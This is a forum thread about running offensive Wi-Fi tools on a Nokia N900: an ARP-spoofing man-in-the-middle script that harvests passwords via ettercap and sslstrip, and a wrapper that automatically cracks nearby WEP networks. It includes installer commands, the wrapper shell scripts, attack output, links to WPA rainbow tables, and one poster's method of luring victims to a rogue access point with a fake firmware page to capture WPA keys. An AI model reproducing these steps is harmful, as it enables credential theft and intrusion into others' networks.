update: new version, everything fixed now:o

You have probably seen the YAMAS MITM ARP spoof script that was recently announced. While an interesting idea, it was not written with the N900 in mind. Thus, it had numerous points that needed addressed before it could be considered ready for N900.


Greetz!

Thanks to comax for writing the thing.

Unhuman for hosting, alerting us to it.

Torpedo48 for testing, development.

Here I present a more N900 friendly version. This is better than the original because:

it has far fewer dependencies
is more compatible with a stock N900
it shutsdown ethercap nicely without barfing on the routers ARP table.

http://i54.tinypic.com/feqxpi.png

REQUIREMENTS:

iptables
nmap
iproute
python-twisted-web
python-openssl
python-scapy
libpcap0.8
libpcre3
sslstrip*see below
ettercap*see below

*Installation guide for ettercap, sslstrip and many other tools can be found at: http://pcsci3nce.info/?p=9

Refer to unhumans original post (http://talk.maemo.org/showthread.php?t=73988) and blog (http://pcsci3nce.info/?p=291) for more details.

Script here:

link (http://pastebin.com/raw.php?i=mBc1tKuL)


Installer!

navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=mBc1tKuL -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

Update: If you are bothered about wifite using /tmp/ on rootfs to store temporary data, run this command AFTER you have installed everything:

sudo sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py; sudo if [ ! -d "/opt/tmp" ]; then mkdir /opt/tmp; fi

Update: Internet super hero Torpedo48 has created the installation/use guide this post was supposed to be. It don't get much easier than this folks! (http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated)

Further to the MITM script above I present another shameless hijacking of somone else's work:

They called it wifite.py...

http://i54.tinypic.com/2qv8ljm.png

I call it wepon!

This is a mildly altered copy of wifite.py with some accompanying scripts to hold the whole lot together.

Why should I care?

You should care because this is a FULLY automated WEP cracking solution. No more spazzing about with any arsecrack. Simply type into the terminal (as root) wepon, then after some minutes some WEP keys will appear on the screen for all the WEP networks around you.

While it is possible to attack WPA networks with wifite I have disabled it for obvious reasons. If you are the kind of person who carries several GB of rainbow tables around on his phone then by all means re-enable it. It was disabled to speed up attack time.


Dependencies?
also install:

iw
macchanger
aircrack 1.1


Operation
The first script runs the original 'load.sh' as written by lxp. It then puts your wifi into injection mode, then runs wifite.py

wifite.py is a work of artistic scripting beauty, more details can be found here (http://code.google.com/p/wifite/).


Installation
copy this script to '/usr/bin/wepon' and chmod +x it

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon


copy this script to '/usr/bin/wepoff' and chmod +x it

#!/bin/sh
/opt/wifi_mon/unload.sh


copy this (http://ifile.it/g04phdr) archive to '/opt/wifi_mon/' and decompress it:

alternative here. (http://ifile.it/dbk6rzh)

decompress with:

tar xzvf wifi.tgz


Final note

When you are done testing pens run the 'wepoff' script. This unloads the wifi injection modules, puts wifi back into normal mode and sets the device to european channels (this simply means up to wifi channel 13 is available).

Massive thanks to lxp for creating these injection drivers. If you have not donated (http://david.gnedt.eu/blog/wl1251/) him at least a measly $1 for his hard work to write them you are a total gonad.

Only for learning purposes, legal blah blah blah blah

Nice was about to write also a tutorial for karam for his thread about wifite;py but you did it already. I have just the original script running and I have no problems at all. But your modified script made me wonder how does it turn monitor mode on?
Why don't you use the mon0 interface spawned by airmon? Since Mentalist Traceur updated iw it doesn't conflict with aircrack anymore and thus airmon works. IMO must easier as you can still browse the web with wlan0 ;)

the i like most about these apps is the legal blah blah blah
cause i bet event those who wrote the app used it for evil

Nice was about to write also a tutorial for karam for his thread about wifite;py but you did it already. I have just the original script running and I have no problems at all. But your modified script made me wonder how does it turn monitor mode on?
Why don't you use the mon0 interface spawned by airmon? Since Mentalist Traceur updated iw it doesn't conflict with aircrack anymore and thus airmon works. IMO must easier as you can still browse the web with wlan0 ;)

I scripted all of this a while back, my copy of iw is just stolen strait outta the debian lenny armel deb! I found wifite to be a bit ropey with putting the device into monitor mode so decided to do it outwith. If you wanted mon0 style monitor mode you can easily just comment out the appropriate ifconfig lines in wepon/wepoff.

Some .deb package on the near horizont??

Thanks for the work.

Or just change these ifconfig lines to airmon-ng start wlan0 ;) Personal I never had problems using wifite.py when putting into monitor mode, I don't use it a lot though but if you say its a bit ropey this would probably a better solution than letting wifite.py do the job.

edit: Forgot to say I like the way you disabled WPA-Attack as you won't come any further with WPA on a phone, except the handshake capture :P WEP is doing great on the N900 :D

I'll test it as soon as I can; BTW could you correct the typo I accidentally wrote in the checking of opt/tmp (line 16 - does not EXIST)? Thanks ;)

Ok, used the script once and it worked pretty bad, something got screwed up since our last version.

1 - Log is saved in root, despite the script telling the user it has been saved in opt/tmp, and vice versa (passwords are saved in opt/tmp, but the script says they are in /root); I'm fixing this in minutes;

2 - Websites are not shown in real time parsing, what happened???

3 - Ettercap is not properly closed, and after the closing of the script victims are not re-arped so the user has to manually enter "q" in ettercap for resetting the network.

EDIT: first point should be fixed now, check this out:
LINK REMOVED TO AVOID CONFUSION

I'm trying it right now...

hi
sorry i just me or there in not link for wepon and wepoff?

Ok, used the script once and it worked pretty bad, something got screwed up since our last version.

1 - Log is saved in root, despite the script telling the user it has been saved in opt/tmp, and vice versa (passwords are saved in opt/tmp, but the script says they are in /root); I'm fixing this in minutes;

2 - Websites are not shown in real time parsing, what happened???

3 - Ettercap is not properly closed, and after the closing of the script victims are not re-arped so the user has to manually enter "q" in ettercap for resetting the network.

EDIT: first point should be fixed now, check this out:
http://pastebin.com/JU3g5Wm3

I'm trying it right now...

Ok point 1 is definitely fixed, however I've discovered some other typos and misfunctions.

@vi_: maybe we should add a warning in OP telling people to not use the script for the moment, as it doesn't provide its original features.

now we just need a valiant person to make a UI for this to make it more n900 friendly :P


nice script btw, ftw!

: not found: line 4:
hackattack.sh: line 26: syntax error: unexpected word (expecting "in")

What should I do?

: not found: line 4:
hackattack.sh: line 26: syntax error: unexpected word (expecting "in")

What should I do?

Please do not use the script, it is still in development, contains many many bugs and needs some more testing before the final release!

why not use the script? i wanna test this script dont worry for the bugs

why not use the script? i wanna test this script dont worry for the bugs

Ok, sorry for the panic :D

Try this one: LINK REMOVED TO AVOID CONFUSION
Note that I didn't work on your problem, just trying to remove little bugs (e.g. the script was trying to delete grepcred.txt, which doesn't exist anymore if I correctly understood what vi_ had did).

same error

same error

Don't know what to say, it works pretty well for me, except for bugs I've already listed (ettercap won't re-arping the victims; some code to trim out; real time parser broken).

Ehi vi_ where are you, we miss you! :p

Just a thought. For all the people reading this forum, could you please give a detailed explanation of what this does. You could also reply "If you don't know, don't ask?" but I'll never learn.

Just a thought. For all the people reading this forum, could you please give a detailed explanation of what this does. You could also reply "If you don't know, don't ask?" but I'll never learn.

Google
http://pcsci3nce.info/?p=9
http://pcsci3nce.info/?p=11

As for the script - I haven't had the time to test it yet, however can it NOT be in this green font :X It is ugly :(

Google
http://pcsci3nce.info/?p=9
http://pcsci3nce.info/?p=11

As for the script - I haven't had the time to test it yet, however can it NOT be in this green font :X It is ugly :(

oopz, seems I ****ed this one up. Gimme some moments to sort this out.

The green font is just my xterm, obviously it will be in what ever color your xterm font is set to.

However everyone knows green font on black background is the leetestist color!

Okay, I think I uploaded the wrong version. I have just tested this version and it works. It parses passwords, creates the log in /opt/tmp and behaves as normal.

Torpedo, please strip all the links in your posts to pastebin in order to avoid confusion.

If for some reason THIS version does not work, there is something extremely fvcking strange going on here.

install script on first post.

Downloaded and tested it. Traffic redirecting is working, tail grep shows traffic to sites, however I get no login credentials in the Passwords window. Moreover, links stay https for me for some reason.

Tho I installed and reinstalled like 50 packages today so it might just be my phone. Waiting for someone to confirm/deny.

unhuman are you using busybox-power?

can you report your busybox version?

It could be a problem with stock busybox egrep.

version 1.18.5

have downloaded it throu the wget link on first page and im running into this error ??


sudo: /usr/sbin/ettercap: command not found


this script worked fine (http://talk.maemo.org/showthread.php?t=73988)

solved i just edited script an took out the s before /bin .. an its now done its job ...

will test abit more but all seems good now many thanks for your work to all involved ..


edit


1 thing i did notice was it doesnt tell you which web site they are from ..

ooooo i forgot ettercap screen isnt terminating either ...

ooooo i forgot ettercap screen isnt terminating either ...

That is because you HAVE to shutdown ettercap maually. i.e. you MUST press q in order for it to re-ARP it's victims. If you dont the network will be foobar till the next arp refresh (could be up to 15 minutes). The original version of this script used arpspoof from dsniff, unhuman changed it to use ettercap, I changed it to NOT blindly kill ettercap. If you can figure out how to send a 'q' keystroke to the ettercap console, let me know.

have downloaded it throu the wget link on first page and im running into this error ??


sudo: /usr/sbin/ettercap: command not found


this script worked fine (http://talk.maemo.org/showthread.php?t=73988)

solved i just edited script an took out the s before /bin .. an its now done its job ...

will test abit more but all seems good now many thanks for your work to all involved ..


edit


1 thing i did notice was it doesnt tell you which web site they are from ..

That means they are using a token to identify the website field in the site you were on that is not defined in the script. The script catches most of them except some are a bit freaky and do things there own way. This is why you have the option to save the complete log, for further analysis.

I wonder why your version of ettercap is installed to a different directory?

Which version did you install? (link pls)

i installed ettercap from this post here .. (http://talk.maemo.org/showthread.php?t=73572)

an it is ettercap NG-0.7.3 ..

cheers

Dependencies?
also install:

iw
macchanger
aircrack 1.1

i.e. apt-get install iw macchanger aircrack1.1
apt-get install aircrack-ng.

There's no "aircrack1.1" package in the repo. "aircrack-ng" in the repos however is on version 1.1.

You (vi_) already prob'ly know this, and I'm guessing that's a typo, so I'm saying this for the sake of others, mainly.

apt-get install aircrack-ng.

There's no "aircrack1.1" package in the repo. "aircrack-ng" in the repos however is on version 1.1.

You (vi_) already prob'ly know this, and I'm guessing that's a typo, so I'm saying this for the sake of others, mainly.

Good advice, but if people can't figure that out, they really should not be playing with a terminal, especially in root :rolleyes:

Sorry, I had to say it! :cool:

Can some give a "how and why" this is different/better than aircrack/f-aircrack for accessing WEP?
I have set this all up and made it as easy as I can, and I will add some desktop icons and list up an install script for all too later :D

Good advice, but if people can't figure that out, they really should not be playing with a terminal, especially in root :rolleyes:

Sorry, I had to say it! :cool:
Normally I'd agree, but because in my ownership of the N900 I went from barely computer savvy Linux newb to a semi-capable N900 user, and it's not really the same thing - it's one thing to say that if you don't know how to change your own password or use the shell you shouldn't use hacking tools - since that kind of stuff is readily available. But in the case of the repository, you have to know in advance that the N900's aircrack-ng package is named in accordance to the standard naming conventions for the package (if there even is such a thing, of which I'm not sure).

And while for something like the shell you can just google "Linux command line tutorial" or something and get a lot of very informative results immediately, the N900's extras repository package listings are less intuitive to search for. It took me months before Nicolai (I have this feeling I'm spelling his name wrong) kindly pointed me to the maemo.org/packages/, where you can actually search packages by name and the like, to see what packages are available and more importantly, to get the name by which they would be labeled in the repository.

No need to conflagrate trivial knowledge about the workings of a specific site's interface with ones ability to use the shell and be generally tech savvy.

Wifite is a real we(a)pon!

http://www.youtube.com/watch?v=D3-Pobgi8JM

That thing cracked my WEP key in less than 3 minutes, and far more efficiently than I would do... :S

hi
i made a bobo
i delete from /home/user wifite.py and wifite.py.1 and now the mitm is not working what do i have to install?
best regards

You guys are evil
buy your own bloody bandwidth and stop stealing your neighbors
just cause he is using an ancient router or is clueless enough to use wep that isnt an excuse to steal bandwidth
p.s it is even more evil to use it to dl warez and get him busted

You guys are evil
buy your own bloody bandwidth and stop stealing your neighbors
just cause he is using an ancient router or is clueless enough to use wep that isnt an excuse to steal bandwidth
p.s it is even more evil to use it to dl warez and get him busted

theres always a kill joy in the house ... im sure people aint using these tools for bad things are they ?>?

well the progrmas wouldnt get made if that was the case chill out or jump on the train an join us lol ,..

You guys are evil
buy your own bloody bandwidth and stop stealing your neighbors
just cause he is using an ancient router or is clueless enough to use wep that isnt an excuse to steal bandwidth
p.s it is even more evil to use it to dl warez and get him busted

Have you read the name of the network I maliciously attack in my two videos?

http://www.youtube.com/watch?v=WEVZ463xilU

http://www.youtube.com/watch?v=D3-Pobgi8JM

Eh eh, I'm doing bad things once I steal their password.. Oh, wait... LOOK! Their network's name is torpedo48! Like mine!! Could this mean that... Well.. It's my OWN bloody wifi network and I can attack and crack it everytime I feel like it.

So... Why am I sharing the knoledge, if I want to be evil? Maybe we do this for testing purpose and security reasons, did you think about that? If people know, people protects themselves.

Since I started using Aircrack on the N900, I've improved my personal network security a lot, and helped improving my father's company's wifi network too. And I publish my video on Youtube and Facebook, so that all my friends (and many other people) stop using WEP keys and unsecure connections.

There will always be real evil people stealing information from unsecured wifi networks, but I think that sharing the knowledge reduces the risk, not the contrary.

ifile is down. Can you upload somewhere else the tar file from post 2?

ifile is down. Can you upload somewhere else the tar file from post 2?

http://laboratorio.torpedo48.it/downloads/wifi.tgz

Just published a simple guide for the very beginners: following it anyone will be able to properly set wifite (with the wepon/wepoff method brought to us by vi_, many thanks to him) and to crack a WEP key in minutes:

http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

@vi_: I'll be honoured if you insert a link to this guide in your article, so that everyone can follow the guide and install your awesome work ;)

Seriously the last 10posts have nothing to do with this topic?..

EDIT:.
Lawl didn't notice post 2... But seriously the 2 scripts have nothing in common and makes the thread discussion ******ed.

Seriously the last 10posts have nothing to do with this topic?..

Why do you say that? We are discussing about the scripts provided in the original posts, so I think they're pretty on-topic:confused:

In response to some PMs I am getting.

1. If you are having difficulty installing this, persevere. It is how ALL of us learned to do this stuff in the first place. My first linux computer was a hp jornada 680, it didn't even have a gui when I started. It took me over a week (see over 20 hours) of hitting my head off a concrete penguin just to connect the thing to my university's wifi. It was back when WPA supplicant had EVEN LESS DOCUMENTATION. Point is, just persevere, you will be a better person after it!

2. Rainbow tables for WPA. MUTS from backtrack had a hand in generating these rainbow tables (http://www.offensive-security.com/wpa-tables/). These beasts are around 2GB in size each and only the top 200 ssids are covered. I estimate an n900 might be able to crunch through these 49 MILLION(!) password dictionaries in around an hour.

Be warned, some of these tables are broken, for example the belkin54g table (I think) has a capital letter at the start (DOH!) rendering it completely worthless (unless someone changed their SSID to it)

[QUOTE=stevomanu;1031301]
my metaspliots work good but it tells mee a error when i start it
the ruby1.8-openssl?????

Omg WPA rainbow tables! I've been meaning to get off my *** and find some, but now I don't have to work for it. Thank you!

Omg WPA rainbow tables! I've been meaning to get off my *** and find some, but now I don't have to work for it. Thank you!

well then, just for you mentalist here (http://forums.hak5.org/index.php?showtopic=12708) are the previous incarnation of said tables. These are 1 million word dictionary tables for the top 1000 SSIDS. These are a little more portable at on 40MB each.

Hey...WPA brute-forcing on the N900 may not be such a crazy idea after all!

I think this (http://ul.to/wsbytb/thomsonRainbowTable.zip) is a thompson speedtouch/bthomehub rainbow table too.

well then, just for you mentalist here (http://forums.hak5.org/index.php?showtopic=12708) are the previous incarnation of said tables. These are 1 million word dictionary tables for the top 1000 SSIDS. These are a little more portable at on 40MB each.

Hey...WPA brute-forcing on the N900 may not be such a crazy idea after all!

I think this (http://ul.to/wsbytb/thomsonRainbowTable.zip) is a thompson speedtouch/bthomehub rainbow table too.

Speedtouch keys even WPA can be derived from SSID: stkeys on n900 and speedtouched for windows?

How can these tables be specific for a manufacturer? If we change the password then they fail also, or am I wrong?

Speedtouch keys even WPA can be derived from SSID: stkeys on n900 and speedtouched for windows?


Stkeys USED to work before they changed the algorithm. Now the hex characters at the end of the speedtouch SSID cannot be used to derive the key. However, the key IS still produced from the devices serial number (or something like that). This reduces the potential keyspace significantly. i.e. The length of the key is known, The character set is known and the format of the serial number is known.

How can these tables be specific for a manufacturer? If we change the password then they fail also, or am I wrong?

I am not sure I understand what you mean. The rainbow table is for a network with that specific SSID. In 'short laymans not really true terms':

WPA key=SHA1SUM(SSID+PASSWORD)

Thus we need a specific table for any given SSID (unlike LANMAN windows table). It has nothing to do with manufacturer, it just so happens than belkin, netgear etc. use their own name as the default SSID and as such that SSID will become one of the most common. In addition to this humans are predictable in their choice of SSID. How many 'skynet's and 'myhome' wifi networks have you seen?

see (http://www.golubev.com/blog/?tag=sha1)

and

I love this one, it is like reading a geek thriller. (http://hakim.ws/st585/KevinDevine/)

Oh i actually just noticed this thread is here

just a bottom line

N900 can hack WEP easily
N900 can hack WPA hardly using rainbow tables
N900 can't hack WPA with normal handshake (it will take for ever)


BUT N900 can hack WPA easily with easy-debian after installing dhcp3
apache2 apache2-mod-php5 and aircrack-ng suit also iptables and iproute

then simply create a fake ap with dhcp3 server and apache2 and in addition to a phisher web page wich has the same bssid and esside of the target (but not he same channel)
then i DOS the orginal AP so the target will automaticly connects to my fake ap ( windows problem)


in my case i use a fake web page
telling the owner that a new firmware has been installed to his router (i know the type of his router with kismet) to create the perfect phisher

and a reconfigure of wep/wpa key is required
so when he enters the key
i get it directly to my n900

That is my way to hack WPA with N900

PS: just linked this thread in my thread
soon with these beautiful threads we would have a super N900

Lol at the social engineering approach. That's always fun.

In the meantime, I think if you have access to some 3G internet and have a server running at home you can SSH into, you should be more that able to launch more hardcore attacks against WPA networks that don't fall prey to your basic on-board rainbow tables.

One thing of possible concern: http://forum.aircrack-ng.org/index.php?topic=5965.0

Looks like the tables provided by Offensive Security have a bunch of invalid passwords. Well, that post is from 2009 so that may have changed by now, but figured I'd mention it and if anyone knows better, they can speak up.

[QUOTE=stevomanu;1031301]
my metaspliots work good but it tells mee a error when i start it
the ruby1.8-openssl?????


you care to share your metaspliots with us then ??

there is an exploit (not public) with wpa/wpa2 system
i forgot what is it called wich allows to easily hack wpa just like wep
PS: IT IS NOT TKIPTUN-NG (another one)
but it is the reason that they will launch another security system
maybe 2013

Here is my output :

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ root


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 29 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 28 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 27 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 26 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 25 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 24 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 23 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 22 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 21 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 20 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 19 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 18 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 17 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 16 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 15 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 14 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 13 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 12 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 11 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 10 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 9 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 8 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 7 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 6 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 5 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 4 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 3 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 2 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 2 targets and 1 clients found

[+] added to attack list: "home3" (99dB)
[+] 1 access points targeted for attack

[+] estimated maximum wait time is 40 minutes
[+] changing mac address to 00:19:5D:4D:25:C3... changed!

[+] attacking "home3"...
[0:09:58] changing mac to 18:86:ac:e1:5a:96...
[0:09:58] changed mac; continuing attack
[0:09:59] started arp replay attack on "home3"; Ctrl+C for options
[0:09:59] arp replay attack on "home3" captured 0 ivs (0/sec) Nokia-N900:/root#
[0:09:59] stopping attack on "home3"...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError


There is many networks in range including my ad-hoc network (home3), the script attacks it first and when i press ctrl & c to change it i get whats written above.
and i have to close xterm and open it again to be able to type 'wepoff'
N.B: Thats of course for scientifical and geological purposes only

Here is my output :

BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ root


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# wepon
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[+] using interface "wlan0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 29 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 28 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 27 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 26 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 25 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 24 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 23 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 22 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 21 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 20 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 19 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 18 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 17 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 16 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 15 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 14 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 13 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 12 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 11 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 10 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 9 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 8 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 7 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 6 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 5 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 4 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 3 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 2 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 2 targets and 1 clients found

[+] added to attack list: "home3" (99dB)
[+] 1 access points targeted for attack

[+] estimated maximum wait time is 40 minutes
[+] changing mac address to 00:19:5D:4D:25:C3... changed!

[+] attacking "home3"...
[0:09:58] changing mac to 18:86:ac:e1:5a:96...
[0:09:58] changed mac; continuing attack
[0:09:59] started arp replay attack on "home3"; Ctrl+C for options
[0:09:59] arp replay attack on "home3" captured 0 ivs (0/sec) Nokia-N900:/root#
[0:09:59] stopping attack on "home3"...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError


There is many networks in range including my ad-hoc network (home3), the script attacks it first and when i press ctrl & c to change it i get whats written above.
and i have to close xterm and open it again to be able to type 'wepoff'
N.B: Thats of course for scientifical and geological purposes only

It seems that the only errors you get are the pexpect one and the python-tk one, althought they are not needed for the attack... Try an apt-get install pexpect, but I don't think it will do much. Is your python up-to-date?

Sorry but I can't really think about any cause for your problem, if you have carefully followed the guide and you're using the modified kernel-power or kernel-power v47 wifite should work properly, you are the first encountering problems. :confused:

It seems that the only errors you get are the pexpect one and the python-tk one, althought they are not needed for the attack... Try an apt-get install pexpect, but I don't think it will do much. Is your python up-to-date?

Sorry but I can't really think about any cause for your problem, if you have carefully followed the guide and you're using the modified kernel-power or kernel-power v47 wifite should work properly, you are the first encountering problems. :confused:

Yes, my pythin version is the latest. And i think what happened is because home3 (my network) is an ad-hoc [shared LAN connection through wireless laptop]
Is there a way that i can choose which network i can crack ? so it doesn't auto. choose home3 ?

Yes. edit the 'wepon' script. comment out the line that puts the device into monitor mode. This will force wifite to put your card into monitor mode (didnt work right for me, apparently worked for mr_pingu).

This will cause wifite to enter a different scan mode and allow network selection.

hi
after 10 h of playing with my n900 ( flash and install all ...) i manage to instal the script but ...

I'm now stuck with arp replay attack on XXXX captured # ivs
then chop-chop attack
what is wrong here ?

I really don't know what's going on here, there's obviously something wrong with your wifites but... What? I've tried searching for wifite's dependences but they all seem to be satisfied here.

Have you used particular tweaks and/or procedures that may have f*****d up your wifi's or network's settings?

new pic better quality
i flash my n900 and install all from 0 no tweaks
also injection rate is slow. any tips ...

I really don't know what's going on here, there's obviously something wrong with your wifites but... What? I've tried searching for wifite's dependences but they all seem to be satisfied here.

Have you used particular tweaks and/or procedures that may have f*****d up your wifi's or network's settings?

Nope, nothing at all
did this work with some1 else here ?
should i edit wepon like vi_ and mr_pingu said to be like that :

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
airmon-ng start wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
airmon-ng start wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

i.e. : airmon-ng start wlan0 insted of ifconfig wlan0

Nope, nothing at all
did this work with some1 else here ?
should i edit wepon like vi_ and mr_pingu said to be like that :

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
airmon-ng start wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
airmon-ng start wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

i.e. : airmon-ng start wlan0 insted of ifconfig wlan0

No, content of wepon should be:

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon

And yes, it works for me and many others.

Success,
i didn't waste a day trying to this working :o.
http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

but make sure you put the codes

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


http://talk.maemo.org/showthread.php?t=74081

If something is not right you should load the drivers manually by cd into the drivers folder and sh load.sh ;)

Then do python /opt/wifi_mon/wifite.py
Or better download wifite.py from wifite homepage and do python /home/user/MyDocs/wifite.py

This way you filter out any error in vi_'s script, but I am almost sure there is nothing wrong with vi_'s script!!!

Success,
i didn't waste a day trying to this working :o.
http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

but make sure you put the codes

#!/bin/sh
#wifite starter
/opt/wifi_mon/load.sh
sleep 2
ifconfig wlan0 down
sleep 1
iwconfig wlan0 mode monitor
sleep 1
ifconfig wlan0 up
sleep 1
python /opt/wifi_mon/wifite.py --power 12 --pps 500 --anon



#!/bin/sh
/opt/wifi_mon/unload.sh


http://talk.maemo.org/showthread.php?t=74081

